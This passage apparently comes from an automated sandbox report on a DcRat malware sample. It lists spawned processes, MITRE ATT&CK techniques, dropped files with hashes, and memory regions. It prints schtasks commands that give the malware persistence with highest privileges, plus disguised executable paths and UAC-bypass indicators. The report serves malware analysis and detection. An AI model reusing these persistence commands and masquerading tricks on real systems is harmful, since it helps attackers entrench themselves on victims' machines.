- Scheduled Task/Job: Scheduled Task
PID:1996

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 12 /tr "'C:\Program Files\Crashpad\reports\wininit.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1584

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Program Files\Crashpad\reports\wininit.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4836

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 12 /tr "'C:\Program Files\Crashpad\reports\wininit.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:228

C:\Program Files\Reference Assemblies\Microsoft\Framework\sihost.exe
"C:\Program Files\Reference Assemblies\Microsoft\Framework\sihost.exe"
1⤵
- UAC bypass
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of AdjustPrivilegeToken
- System policy modification
PID:424

C:\Program Files (x86)\Windows Defender\ja-JP\Idle.exe
"C:\Program Files (x86)\Windows Defender\ja-JP\Idle.exe"
1⤵
- UAC bypass
- Executes dropped EXE
- Checks whether UAC is enabled
- System policy modification
PID:3948

C:\Users\All Users\lsass.exe
"C:\Users\All Users\lsass.exe"
1⤵
- UAC bypass
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of AdjustPrivilegeToken
- System policy modification
PID:1896

C:\Recovery\WindowsRE\unsecapp.exe
C:\Recovery\WindowsRE\unsecapp.exe
1⤵
- UAC bypass
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of AdjustPrivilegeToken
- System policy modification
PID:1816

C:\Users\Public\Desktop\System.exe
C:\Users\Public\Desktop\System.exe
1⤵
- UAC bypass
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of AdjustPrivilegeToken
- System policy modification
PID:4744

C:\Program Files (x86)\Windows Portable Devices\Registry.exe
"C:\Program Files (x86)\Windows Portable Devices\Registry.exe"
1⤵
- UAC bypass
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of AdjustPrivilegeToken
- System policy modification
PID:3740

C:\Users\All Users\Packages\d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
"C:\Users\All Users\Packages\d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3468

C:\Program Files\Reference Assemblies\Microsoft\Framework\sihost.exe
"C:\Program Files\Reference Assemblies\Microsoft\Framework\sihost.exe"
1⤵
- UAC bypass
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of AdjustPrivilegeToken
- System policy modification
PID:1444

C:\Program Files\Windows Media Player\Network Sharing\sppsvc.exe
"C:\Program Files\Windows Media Player\Network Sharing\sppsvc.exe"
1⤵
- UAC bypass
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of AdjustPrivilegeToken
- System policy modification
PID:1216

C:\Recovery\WindowsRE\winlogon.exe
C:\Recovery\WindowsRE\winlogon.exe
1⤵
- UAC bypass
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of AdjustPrivilegeToken
- System policy modification
PID:564

C:\Program Files\WindowsPowerShell\explorer.exe
"C:\Program Files\WindowsPowerShell\explorer.exe"
1⤵
- UAC bypass
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of AdjustPrivilegeToken
- System policy modification
PID:1116

C:\Windows\PolicyDefinitions\uk-UA\dwm.exe
C:\Windows\PolicyDefinitions\uk-UA\dwm.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4268

C:\Program Files (x86)\Windows Defender\ja-JP\Idle.exe
"C:\Program Files (x86)\Windows Defender\ja-JP\Idle.exe"
1⤵
- UAC bypass
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of AdjustPrivilegeToken
- System policy modification
PID:2868

C:\Program Files\Crashpad\reports\wininit.exe
"C:\Program Files\Crashpad\reports\wininit.exe"
1⤵
- UAC bypass
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of AdjustPrivilegeToken
- System policy modification
PID:2552

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Setup Files\csrss.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Setup Files\csrss.exe"
1⤵
- UAC bypass
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of AdjustPrivilegeToken
- System policy modification
PID:2812

C:\Recovery\WindowsRE\dllhost.exe
C:\Recovery\WindowsRE\dllhost.exe
1⤵
- UAC bypass
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of AdjustPrivilegeToken
- System policy modification
PID:3040

C:\Windows\en-US\sysmon.exe
C:\Windows\en-US\sysmon.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2904

C:\Program Files\Windows Portable Devices\taskhostw.exe
"C:\Program Files\Windows Portable Devices\taskhostw.exe"
1⤵
- UAC bypass
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of AdjustPrivilegeToken
- System policy modification
PID:2200

C:\Program Files\Reference Assemblies\Microsoft\Framework\sihost.exe
"C:\Program Files\Reference Assemblies\Microsoft\Framework\sihost.exe"
1⤵
- UAC bypass
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of AdjustPrivilegeToken
- System policy modification
PID:3544

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Windows Portable Devices\Registry.exe

Filesize
984KB

MD5
808d571c621732642832aaca4a519717

SHA1
cf71f6fc8f7ad0d691cf899928296be33ed46e49

SHA256
d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce

SHA512
f01bb94b9bc2482aebb8862a2cc6a1f43afce1796df373c4d3dd2c33e68f06849c704a4c0a79320f6a1ab04c5227416445c4fe715c18fdfc0bc123f0f79cfb88

Download Submit
C:\Program Files (x86)\Windows Portable Devices\Registry.exe

Filesize
984KB

MD5
da4d66fe328d749c558da6e3a4899270

SHA1
a7cd9ca71fe9f1ea3217cf8e1633dc811f56a211

SHA256
d9d151ab0ca505bbc07d24e1d4440b39b5e1bc95c2f92fdd9e37a155d4ed141e

SHA512
169a93fe2e293028b85838c469e6a763abefa54b6515f4656a2094140c3cf48ff83eab4486b6229ca73228385cad9b79687424dbf58928164221bb690a9acff6

Download Submit
C:\Program Files\Reference Assemblies\Microsoft\Framework\sihost.exe

Filesize
984KB

MD5
5f39446fb018e7c1071ed23732fd4d69

SHA1
e58e2f7bd68d200a9deef495a3c3a08c8700b1b2

SHA256
16d6197c3eb16d27bfa73f43417ea67553fa64aa6802c9984eedd42eaef6da43

SHA512
f93ea550eb41b42de047449312e050ed7f8ccb2ab53d614e2ae320b5fcd42fe4378be9bc3bd5ba5dfe771b5baead2929fcc3ab5fbd25d3bd978df3742ba75da4

Download Submit
C:\Program Files\Windows Media Player\Network Sharing\sppsvc.exe

Filesize
984KB

MD5
cdb42b288ca93e4e71da5b0317da5417

SHA1
5b386160873fde87dad070bf9afe7731c97e62a3

SHA256
7eea1c07513a51033ca7b008c502600f424a6818874e8683019b70c48b2bf0dc

SHA512
52a1e5a861e25a208890a44419c7665423dcc25aca51fd26e31cb5bc6ae1390400e9cf1fab657963bb33918dd2c9999efb3d64399d0e654dd8ab44e47e777fe5

Download Submit
C:\Program Files\Windows Portable Devices\taskhostw.exe

Filesize
984KB

MD5
c9fccbd6ca68a603728874f6823988f2

SHA1
eff5bc3849c42fdba4c3a90c0ca5869fe40711e5

SHA256
74f0ca552e16bcf412eca52edbaea8d5cda9adedd2b8ee4f785c673327562386

SHA512
7b50f0ed13c77d43e01aeb2688dcc1de073d956301707613c5fb807a2bc7d4ab9063ec08bd08ac73c743086af944d67227d0ad683e49ddb6f011e5666af0277b

Download Submit
C:\Recovery\WindowsRE\5940a34987c991

Filesize
622B

MD5
1e3fe4ac12519a6fce3cd4edb9faa974

SHA1
3408b5ab32e0067948280da014f2bef98ce6ad17

SHA256
90a481ddf891f46c7ea45cf89a479dd000e970de15819635a2d58a4ee8a4a476

SHA512
b961bd27b0c713e0bee569f6e1a385e7ded8781b2ac7e148d4b7db67aa0df54c509672091a4ae6990c277dc95d8b8cc2605fd6f381664b760036131a2ab9a023

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\System.exe.log

Filesize
1KB

MD5
baf55b95da4a601229647f25dad12878

SHA1
abc16954ebfd213733c4493fc1910164d825cac8

SHA256
ee954c5d8156fd8890e582c716e5758ed9b33721258f10e758bdc31ccbcb1924

SHA512
24f502fedb1a305d0d7b08857ffc1db9b2359ff34e06d5748ecc84e35c985f29a20d9f0a533bea32d234ab37097ec0481620c63b14ac89b280e75e14d19fd545

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe.log

Filesize
1KB

MD5
7f3c0ae41f0d9ae10a8985a2c327b8fb

SHA1
d58622bf6b5071beacf3b35bb505bde2000983e3

SHA256
519fceae4d0dd4d09edd1b81bcdfa8aeab4b59eee77a4cd4b6295ce8e591a900

SHA512
8a8fd17eef071f86e672cba0d8fc2cfed6118aff816100b9d7c06eb96443c04c04bc5692259c8d7ecb1563e877921939c61726605af4f969e3f586f0913ed125

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
120B

MD5
5c37fb9a06ec5e24316c99b969ad3c1b

SHA1
ebcde24081714a20d1c88f5527fce3aa6da6b833

SHA256
d25c8dcd9eaedf398d9dc315f41aaa063043b27ea21b717cc79d6259b77c78ae

SHA512
517cf9aea5440ff85d5df41e9443ae41cb31a0d85c0023a87a272369c86bf4c66e9c42321a9c10cc6157cb24bd9f4d641a8f5f0f1204ae08642047ca6b9c045f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
62623d22bd9e037191765d5083ce16a3

SHA1
4a07da6872672f715a4780513d95ed8ddeefd259

SHA256
95d79fd575bbd21540e378fcbc1cd00d16f51af62ce15bae7080bb72c24e2010

SHA512
9a448b7a0d867466c2ea04ab84d2a9485d5fd20ab53b2b854f491831ee3f1d781b94d2635f7b0b35cb9f2d373cd52c67570879a56a42ed66bc9db06962ed4992

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
bd5940f08d0be56e65e5f2aaf47c538e

SHA1
d7e31b87866e5e383ab5499da64aba50f03e8443

SHA256
2d2f364c75bd2897504249f42cdf1d19374f5230aad68fa9154ea3d03e3031a6

SHA512
c34d10c7e07da44a180fae9889b61f08903aa84e8ddfa80c31c272b1ef9d491b8cec6b8a4c836c3cb1583fe8f4955c6a8db872515de3a9e10eae09610c959406

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
3a6bad9528f8e23fb5c77fbd81fa28e8

SHA1
f127317c3bc6407f536c0f0600dcbcf1aabfba36

SHA256
986366767de5873f1b170a63f2a33ce05132d1afd90c8f5017afbca8ef1beb05

SHA512
846002154a0ece6f3e9feda6f115d3161dc21b3789525dd62ae1d9188495171293efdbe7be4710666dd8a15e66b557315b5a02918a741ed1d5f3ff0c515b98e2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
e448fe0d240184c6597a31d3be2ced58

SHA1
372b8d8c19246d3e38cd3ba123cc0f56070f03cd

SHA256
c660f0db85a1e7f0f68db19868979bf50bd541531babf77a701e1b1ce5e6a391

SHA512
0b7f7eae7700d32b18eee3677cb7f89b46ace717fa7e6b501d6c47d54f15dff7e12b49f5a7d36a6ffe4c16165c7d55162db4f3621db545b6af638035752beab4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
59d97011e091004eaffb9816aa0b9abd

SHA1
1602a56b01dd4b7c577ca27d3117e4bcc1aa657b

SHA256
18f381e0db020a763b8c515c346ef58679ab9c403267eacfef5359e272f7e71d

SHA512
d9ca49c1a17580981e2c1a50d73c0eecaa7a62f8514741512172e395af2a3d80aeb0f71c58bc7f52c18246d57ba67af09b6bff4776877d6cc6f0245c30e092d6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
085e0a3b869f290afea5688a8ac4e7c5

SHA1
0fedef5057708908bcca9e7572be8f46cef4f3ca

SHA256
1fed2c9bc05b3fcb93f493124dbf1680c6445f67e3d49680257183132514509c

SHA512
bbac0555a05dbe83154a90caa44a653c8a05c87594a211548b165c5b1d231e3818830e754c0b6de3e5cb64dba3a5ad18bebae05cb9157e1dd46bce2a86d18ede

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
50d3033f2bc3a3774c469d03e71a79a9

SHA1
22027b1d52085de99b3bffa276530fea5d961471

SHA256
2987e99ec7fa17bd4ab7de3cb4dc62645e1052012a5a357904d6fc6db9054147

SHA512
ecf7ab1a9e4192454a3e24c60453fd702a8c648e00078fc933b9182f4a3d3c10c6f5da622a5729b35727e6ddc8837029caddcaf76f56e805b9744253b56da5d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
20ccd8eee8fb63b0f660c38299f815d4

SHA1
5882e3b12448a5cd6ab57008c1be852ac84cade1

SHA256
cad714968818e2c4fec544ad7aa0faf5da04809f8efd1a8699d2861d0c0809e3

SHA512
28b87bd117a752ce699bd00c651c095dcfdb2a6cf71687177862c9062c3f73243ac32ac1b709804f940eef8c1f3e233593c73c4831449742c931d8c845c9fd8f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
dd0716df5ff6e2ed8bfa08e271d64dd8

SHA1
c342bbe936058ea27843d5dbe5eb434f926612f7

SHA256
15ea3598b422f0d7705405688a174b98789b623154d4ccf3f3148f7c10bafdd8

SHA512
7e6dc8f9ad269ca3969e7b1284399f16f59559d5a4232537147fb7edcba86932474eff26921c09472894d55ee045dd3e371dcfce65d358785166742582e0b8a4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
150616521d490e160cd33b97d678d206

SHA1
71594f5b97a4a61fe5f120eb10bcd6b73d7e6e78

SHA256
94595c05912cbb8380f7ed34499eb01fb91707a1ed1c02c02002a4361e889827

SHA512
7043dc4b336b1688205fbe762e731478ecaa0036c9f5e0434c79b8a6f8fa58b0705c8674fd6a047e6009edc52c37ce4e2ce81694e13b79a3e8183a32307f3815

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
7a451cd1316d70a65910773fee8c3a43

SHA1
d2db32d5037153dd1d94565b51b5b385817a3c3d

SHA256
862d25ed22075f3d1f5e8d29a3c6e050dc91e53a4dc653c3f0f7c627a12ee26c

SHA512
60887f795036fbd6d25234c17dab4463a8a02f576ae8c07dd7b4c4ff1dba35f99b7301139ea051a7a80fdfc9e003a2f0c2dd0d444a82ecf87a3df21507332aa6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
3505effaead0f06d098f1aec01836881

SHA1
94bafdbeb2f5adbd8cec709574df5b8dbcc5eba3

SHA256
5d39a25ff8842c7c14aa14f99c5e3e1606fb7516c57f03dc41069df3c3de0517

SHA512
934d8eab5bc2ec20e800c668f3c3434829feade4771918a22d712f7ba39f91f93877a1e9dc1beac966646af0c9dd2cf118041535143b3abc585fea8dfb1299f5

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fpkskufc.mmn.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\sFa82cOwXa.bat

Filesize
210B

MD5
61b30754aa6f56c4e9ca30b3004d3ee4

SHA1
129fb88bde0f8a9822c33f96a4c93d7ffec1ceb6

SHA256
dd46cfb02388ef0c1c511b00d3251e9633333e78d773b6a79d2de4d0c9947943

SHA512
30346837e78b1cc7853ba80b1d457e3ea9ef7b2c653016f760cc75a44e0d7c12f9e3fae4e711a76b6893114912df307e540d7dbe786dfd902e813de1ce5c987f

Download Submit
C:\Users\Admin\AppData\Local\Temp\v0XtNn8zIq.bat

Filesize
267B

MD5
32c3385b9ba53e0daa170f3d1315b199

SHA1
382d2c7b4bfe974cccc7b0b1a5435038bea9335a

SHA256
f96042a826388f9f4e5eb3917050c4acfea072b9ff1593ef3ab6f557af656209

SHA512
835548f780e8084e038ffd1d6bee163363511156e29ebf3db69b19bbd6126967aff6404e4c2a7260c4887e1099e4319f281219de614366be2bcd226be5001d8a

Download Submit
C:\Users\Public\Desktop\System.exe

Filesize
984KB

MD5
576d2968a5c055d0d26b52ce90cc810b

SHA1
3f092e14b5dd3b60d5a24befeb73b3b0aa98cd69

SHA256
7bf41581ca59aeafad0e3ef4255259cd373a193082a5fc709faf90d72574568d

SHA512
faeaeebc94f9ffec10e84fea8d33423e14225fc302db3c301fcab98ea97f71bb16e53deeaafd10dd91c6c88aa75caff03e8ec794c6e24a3ca7f88ee926c6d3de

Download Submit
C:\Windows\PolicyDefinitions\uk-UA\dwm.exe

Filesize
984KB

MD5
1b26a2fe4cbcc99112c26aae4a5bb115

SHA1
41983d1915b04404dea3df828d7041d635edbe7d

SHA256
79e413a952d33c3b98c712f4fc55c899ec1c647e335929db4449d64877b5f187

SHA512
0f920f5b3bbdeb303e2340ee42c415f9aea068138d3085e4b82c9911cdde5f5e6f8a9d26c825b092185ef9023212aafe72f95e10588c1aa96fcc4f9ea58fe029

Download Submit
C:\Windows\Prefetch\ReadyBoot\dwm.exe

Filesize
984KB

MD5
d2ea06c8e3050b71e7e31e52afc98ae6

SHA1
a6517c96cfcb06812ab71a111c1e19dc0d8520b9

SHA256
a3c810c97bf1812455d811a70840133ca7cb99154e7936d992e2ab55f0b8d3d8

SHA512
baecec4fbd42f687b564108c810c2e84966cbcfea3a2bf215dfd71574f0249ee1942602ba2197635bdeb8a0237c5ffd67b560a33983bb876f327b8a73f58e5c4

Download Submit
memory/424-499-0x0000000000BD0000-0x0000000000CCC000-memory.dmp

Filesize
1008KB

Download
memory/1216-521-0x0000000000110000-0x000000000020C000-memory.dmp

Filesize
1008KB

Download
memory/2200-548-0x0000000000580000-0x000000000067C000-memory.dmp

Filesize
1008KB

Download
memory/3568-10-0x0000000002770000-0x000000000277C000-memory.dmp

Filesize
48KB

Download
memory/3568-4-0x0000000000DA0000-0x0000000000DA8000-memory.dmp

Filesize
32KB

Download
memory/3568-97-0x00007FFE03253000-0x00007FFE03255000-memory.dmp

Filesize
8KB

Download
memory/3568-132-0x00007FFE03250000-0x00007FFE03D11000-memory.dmp

Filesize
10.8MB

Download
memory/3568-18-0x00007FFE03250000-0x00007FFE03D11000-memory.dmp

Filesize
10.8MB

Download
memory/3568-13-0x00000000027A0000-0x00000000027AC000-memory.dmp

Filesize
48KB

Download
memory/3568-15-0x00007FFE03250000-0x00007FFE03D11000-memory.dmp

Filesize
10.8MB

Download
memory/3568-14-0x00000000027B0000-0x00000000027BC000-memory.dmp

Filesize
48KB

Download
memory/3568-0-0x00007FFE03253000-0x00007FFE03255000-memory.dmp

Filesize
8KB

Download
memory/3568-11-0x0000000002780000-0x0000000002788000-memory.dmp

Filesize
32KB

Download
memory/3568-12-0x0000000002790000-0x000000000279E000-memory.dmp

Filesize
56KB

Download
memory/3568-8-0x0000000002750000-0x000000000275C000-memory.dmp

Filesize
48KB

Download
memory/3568-9-0x0000000002760000-0x000000000276C000-memory.dmp

Filesize
48KB

Download
memory/3568-115-0x00007FFE03250000-0x00007FFE03D11000-memory.dmp

Filesize
10.8MB

Download
memory/3568-5-0x00000000026F0000-0x0000000002700000-memory.dmp

Filesize
64KB

Download
memory/3568-7-0x0000000002700000-0x000000000270A000-memory.dmp

Filesize
40KB

Download
memory/3568-235-0x00007FFE03250000-0x00007FFE03D11000-memory.dmp

Filesize
10.8MB

Download
memory/3568-1-0x00000000004C0000-0x00000000005BC000-memory.dmp

Filesize
1008KB

Download
memory/3568-6-0x0000000002720000-0x0000000002736000-memory.dmp

Filesize
88KB

Download
memory/3568-3-0x0000000000D90000-0x0000000000D9E000-memory.dmp

Filesize
56KB

Download
memory/3568-2-0x00007FFE03250000-0x00007FFE03D11000-memory.dmp

Filesize
10.8MB

Download
memory/3568-156-0x00007FFE03250000-0x00007FFE03D11000-memory.dmp

Filesize
10.8MB

Download
memory/4268-530-0x0000000000510000-0x000000000060C000-memory.dmp

Filesize
1008KB

Download
memory/4744-510-0x00000000003E0000-0x00000000004DC000-memory.dmp

Filesize
1008KB

Download
memory/4896-229-0x00000279CA0A0000-0x00000279CA0C2000-memory.dmp

Filesize
136KB

Download